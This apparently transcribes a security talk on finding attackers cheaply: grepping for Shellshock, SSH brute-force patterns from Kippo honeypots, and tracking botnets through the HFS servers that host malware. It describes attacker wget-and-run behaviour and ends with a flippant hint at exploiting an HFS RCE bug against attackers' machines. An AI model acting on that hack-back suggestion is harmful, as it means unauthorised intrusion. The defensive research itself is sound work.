Quantcast

No Budget Threat Intelligence 3: Discovery and Investigation

Andrew Morris has got some great points on the vulnerabilities prevalently used by remote attackers on the Internet, so read this part to learn what those are.

Discovery & Investigation

Shellshock is still in vogue

Shellshock is still in vogue

We are now going to talk about discovery and investigation. Bad guys are still using Shellshock to propagate pretty heavily on the Internet. You are still going to see a good bit of that. It’s still working, there’s still a bunch of stuff that’s unpatched for that, believe it or not. If you want to start no budget threat intel tracking bad guys that are propagating with Shellshock, just look at all of your Apache logs and ‘grep’ for the standard Shellshock characters that you are going to see in Shellshock requests, the standard things like that, which is right here (see right-hand image). I discovered a couple of groups that are still propagating with Shellshock, with a lot of boxes that they are using: one group in Russia, one group in the Netherlands.

Crazy amount of authentication attempts

Crazy amount of authentication attempts

But mostly, the stuff that I look at is SSH, because it’s super-common on the Internet. There’s a lot of SSH that’s facing the Internet. There’s a lot of SSH that’s configured poorly, a lot of really bad credentials that are being used. So it’s a number one kind of trace for bad guys to use. Bad guys try lots and lots of passwords on the Internet. There’s a group in Hong Kong – I was actually just talking about them earlier – that I’ve seen over 100,000 authentication attempts per box per day from them. They’ll literally just sit there and just try to authenticate with everything. And this is the range that they are coming from (see left-hand image).

If you ever feel like checking your SSH logs or anything like that, I guarantee you 100% you’re going to have authentication attempts from them. And the thing is, you’ll look at the passwords that they try, and they do “password 1” and then “Password 1”. They do that stuff, but they actually try some really-really advanced crazy passwords that I’m pretty sure have come from password dumps from elsewhere, or they just are actually banking on doing brute-force attacks that are real, actual brute-force attacks. They are just going to keep on doing it forever.

You don’t really see actual operators too often log into Kippo instances.

Usually the stuff behind the SSH people is just automated scripts. You don’t really see actual operators too often log into Kippo instances. It’s usually something to log in, run an automated “uname –a”, wget a piece of malware based on the output of that, and then it will execute it or whatever. But you do still get actual operators because, obviously, that’s not going to work all the time, and so sometimes you’ll see an actual person, a human being, that logs in and actually checks “Oh, what’s going on here?”

Popular passwords that bad guys try

Popular passwords that bad guys try

Again, a lot of really cool SSH data – these are the passwords that people actually have been trying (see right-hand image). I’ve seen around 24,000 instances of people trying “root” as the password and so on and so forth.
SSH library versions used by the Hong Kong cybercriminal group

SSH library versions used by the Hong Kong cybercriminal group

There’s a bunch of SSH library versions that people use as well (see left-hand image). The most common is SSH-2.0-PuTTY. That’s kind of a weird statistic here just because that is actually just what the Hong Kong group that I’ve been talking about uses. It’s not actual PuTTY, it’s just whatever they configured the brute-forcer that they wrote to use as the banner. You can think of it kind of like a user agent. A funny thing about this is you’ll see the names of hacking tools in the library versions. It will be, like, SSH-2.0_Medusa. Well, that’s definitely not a regular remote administration tool.

SSH gotchas

SSH gotchas

A couple of SSH gotchas (see right-hand image). Bad guys love using SFTP, and Kippo doesn’t include SFTP by default. So, if they try to negotiate an SFTP session or whatever, it’s going to fail by default. But some guy who’s a lot smarter than me wrote an SFTP patch. You can incorporate that into your honeypots, and you will get so much more malware when you do that. A lot of people log in to do ‘wget’, but bad guys are going to want to just do it in line with SFTP. So I actually forked over a version of Kippo. I added an SFTP patch, an option to disable this weird fake jail that Kippo does, which I hate. I added some more default creds and I got rid of the port 80 ‘wget’ limitation that Kippo has by default. And the reason the developer put a limitation on Kippo was because he didn’t want people using Kippo instances as port scanners, but I don’t care, I’d rather get more malware.

HFS example

HFS example

You are going to see a lot of this (see right-hand image) when you start doing this. You are going to see a ton of these HFS web servers when you start looking at attacks like this. They are all in Chinese, of course. And you are going to see the filename, the size of the file in here, the date uploaded, and the amount of downloads, which is important because that can let you track how big a botnet may be. If you see that something was uploaded three days ago and you see that it’s got 9,000 downloads, then you can usually say, okay, these people probably have 8,000-9,000 bots sitting on their thing – just from this as the source.

HFS heavily exploited

HFS heavily exploited

And you are going to see a ton of these (see left-hand image). I mean, they are everywhere. This one version in particular – bad guys just love this stuff. I don’t know why. It literally does the same thing as Apache. It has directory listing enabled by default, so if there’s one sample or ten samples, you can get all of them just as a result of getting access or seeing the path of one.

No budget techniques

No budget techniques

So, some no budget tactics for this kind of stuff (see right-hand image). You can Google dork for these web servers. Google is weird about indexing things that aren’t on port 80, though, so that’s a little bit difficult. Intext:“httpfileserver” – you can look for that. If you feel like grotesquely violating the Computer Fraud and Abuse Act, HFS is vulnerable to a really bad RCE bug, and no one ever uses the updated version. So, if you do feel like getting criminal and executing code on their boxes or whatever – you can, there’s an exploit for it, it works.
 

Read previous: No Budget Threat Intelligence 2: Setting up Cheap Honeypots

Read next: No Budget Threat Intelligence 4: Reversing Malware Samples

Like This Article? Let Others Know!
Related Articles:

Leave a comment:

Your email address will not be published. Required fields are marked *

Comment via Facebook: